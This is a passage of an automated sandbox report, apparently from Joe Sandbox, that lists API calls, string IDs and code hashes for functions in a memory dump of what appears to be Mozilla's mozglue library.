                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                                      • Opcode ID: 2b723a26c9d0f1d67eb312bb60d1302e3f85d54a17f814879d57727d1f3f4e77
                                                                                                                                                                                                                                      • Instruction ID: fb1a73abda743c43fb9db7068412ef3280ed5c7c769fd1d3022a1d3063ceb20c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b723a26c9d0f1d67eb312bb60d1302e3f85d54a17f814879d57727d1f3f4e77
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA21B1B26007109FDB209F29C880B8AB7E5EF45764F158469D99A97650E738E882CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD1EC
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD1F5
                                                                                                                                                                                                                                        • Part of subcall function 6BAAAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BAAAE20
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD211
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAAD217
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD226
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD279
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAAD2B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3049780610-0
                                                                                                                                                                                                                                      • Opcode ID: 1ed024c6c384e0050777d739799c5b395167d412514335570c0a2df6d43499de
                                                                                                                                                                                                                                      • Instruction ID: 8f9e52c9a3ce00ac56a0897b4a25104a3f0e2d1960b146f0a511b45a7741376c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ed024c6c384e0050777d739799c5b395167d412514335570c0a2df6d43499de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC218075608305EFCF04DF24C498A9EB7A1FF8A324F50462EE95687340DB35E94ACB96
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,6BA61C5F), ref: 6BA620AE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BA620CD
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA620E1
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6BA62124
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                      • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                                                                                      • API String ID: 4190559335-2476802802
                                                                                                                                                                                                                                      • Opcode ID: 24ce58c1708c1b3677b76a36fe332257a62d3998debb4e42281dc21f03d325d2
                                                                                                                                                                                                                                      • Instruction ID: 76e220574412601aadc017960dc7aca267245d3b76c7e16440e55226c746e9a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24ce58c1708c1b3677b76a36fe332257a62d3998debb4e42281dc21f03d325d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40212876408309AFDF118F94DC48D9B3BB6FB8A365F048119FE1592250DB36D8A2DF61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA999C1
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999CE
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999F8
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA99A05
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A0D
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: GetCurrentThreadId.KERNEL32 ref: 6BA99A95
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A9D
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA99ACC
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA99BA7
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA99BB8
                                                                                                                                                                                                                                        • Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA99BC9
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BA99A15
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                                                                                                                                                                      • API String ID: 2359002670-141131661
                                                                                                                                                                                                                                      • Opcode ID: d1f4e12849da6a3ff57bb00d3385d97ce3172a48568ac11b9d26f442486a5f7f
                                                                                                                                                                                                                                      • Instruction ID: 7b7e86dcedbffe4a79230a47e79459aeb709a7bf4624e5d940148e13a675c74b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1f4e12849da6a3ff57bb00d3385d97ce3172a48568ac11b9d26f442486a5f7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1201087581C224AFDF106F24A90876A37B4EBC6654F04811AED4553302CB3DC882D6B1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6BA61FDE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6BA61FFD
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA62011
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6BA62059
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                      • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                      • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                      • Opcode ID: d2c29da6c671afbebda91e00e1878da15e4d5fe187d5036c9d430a6485829404
                                                                                                                                                                                                                                      • Instruction ID: 2a496bdbf72b4d5439d35e77d0670949ba7266ec4af115ffa36c055ed5fb7c24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2c29da6c671afbebda91e00e1878da15e4d5fe187d5036c9d430a6485829404
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D1179B4548304BFEF208F64C849E9B3B79FB8A395F00C02DE90582280DB36D982DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll), ref: 6BA6631B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BA6633A
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA6634E
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6BA66376
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                      • String ID: CoUninitialize$combase.dll
                                                                                                                                                                                                                                      • API String ID: 4190559335-3846590027
                                                                                                                                                                                                                                      • Opcode ID: 818a5d45611cfa253ee0d3939c522a8aae1e3f2f34ec004c9f578142463f98cb
                                                                                                                                                                                                                                      • Instruction ID: dbc13991353d699ec36c45b0da2594f1348f733bf6e788891a196cbd0d219d7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 818a5d45611cfa253ee0d3939c522a8aae1e3f2f34ec004c9f578142463f98cb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A0148B4408301CFEF008F28D558B9677B1B78A355F08826DDE01C2380EB7AE483CE55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA9BAE
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6BAA9BC3
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6BAA9BD9
                                                                                                                                                                                                                                        • Part of subcall function 6BAA93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA94C8
                                                                                                                                                                                                                                        • Part of subcall function 6BAA93B0: free.MOZGLUE(6BAA9281,?), ref: 6BAA94DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                                                                                                      • Opcode ID: 217247cd00dbececb857a20846198d99a87df03d5b18f73c8013b27fac4e0c98
                                                                                                                                                                                                                                      • Instruction ID: cbdcb28df9d9637c0793816ed6a47a3b7093025ce3eea6675c7b01a3d4e2685e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 217247cd00dbececb857a20846198d99a87df03d5b18f73c8013b27fac4e0c98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02B1AF75A04B058BCF01CF68C58055FF3F5FFC9324B148669E859AB241DB36E986CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA96060: moz_xmalloc.MOZGLUE(00000024,02BBF361,00000000,?,00000000,?,?,6BA95FCB,6BA979A3), ref: 6BA96078
                                                                                                                                                                                                                                      • free.MOZGLUE(-00000001), ref: 6BA972F6
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BA97311
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                      • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                                                                                                                                                                      • API String ID: 3009372454-760240034
                                                                                                                                                                                                                                      • Opcode ID: 95b462b498255f9cbe75177c250e2e541ede2d2e1c726c8cd13eb1d23f7244d9
                                                                                                                                                                                                                                      • Instruction ID: b14b07b316fbfd4062759c959f65e67d3848916d7317b4f090d7099fabbc06f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95b462b498255f9cbe75177c250e2e541ede2d2e1c726c8cd13eb1d23f7244d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1771A871F102158FDF14DF69D9906AEB7F2BF84304F29812DD819AB310DB39A986CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BAAC1F1
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BAAC293
                                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6BAAC29E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fgetc$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1522623862-0
                                                                                                                                                                                                                                      • Opcode ID: ac61df89897ac00736d4e04c0be80af44986d419e7399ac36450f7c3c6f0c833
                                                                                                                                                                                                                                      • Instruction ID: 798913d4610daf57b2dc652be2d17ec747f6102a48db647ee8ed39a2ed0c5a8e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac61df89897ac00736d4e04c0be80af44986d419e7399ac36450f7c3c6f0c833
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1861BD71A04214DFDF14CFACD88059EBBB5EF49310F19456AE812A7250E735A989CFB0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 6BA9CA57
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9CA69
                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 6BA9CADD
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9CAEA
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA9CAF5
                                                                                                                                                                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BA9CB19
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432163150-0
                                                                                                                                                                                                                                      • Opcode ID: a8174f3d3883fa43b1d339e949c75fe0d7d8698f9e507144f4d3bcf66a12c178
                                                                                                                                                                                                                                      • Instruction ID: b672139e4c211adc196c24e030f83d9d445cb4efa5a12ff80113a223c3556227
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8174f3d3883fa43b1d339e949c75fe0d7d8698f9e507144f4d3bcf66a12c178
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1421F331A58B488BCB09AB38984556BB7BAFFC6305F408629E855A7180FF78D9C58781
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6BAAC82D
                                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6BAAC842
                                                                                                                                                                                                                                        • Part of subcall function 6BAACAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6BACB5EB,00000000), ref: 6BAACB12
                                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6BAAC863
                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6BAAC875
                                                                                                                                                                                                                                        • Part of subcall function 6BA8B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6BACB636,?), ref: 6BA8B143
                                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6BAAC89A
                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAAC8BC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2745304114-0
                                                                                                                                                                                                                                      • Opcode ID: d0705039aa7f865854f793aa2932ec26f0888c269744f626f6661787f1107723
                                                                                                                                                                                                                                      • Instruction ID: 4ae44312889c4f70e1d384a2b1a67589bed1f297bdbd516d2d7f300461b04011
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0705039aa7f865854f793aa2932ec26f0888c269744f626f6661787f1107723
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7119071A043099BDF00DFA4C8898AEBBB5FF89310F404129E50697381EB35D946CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
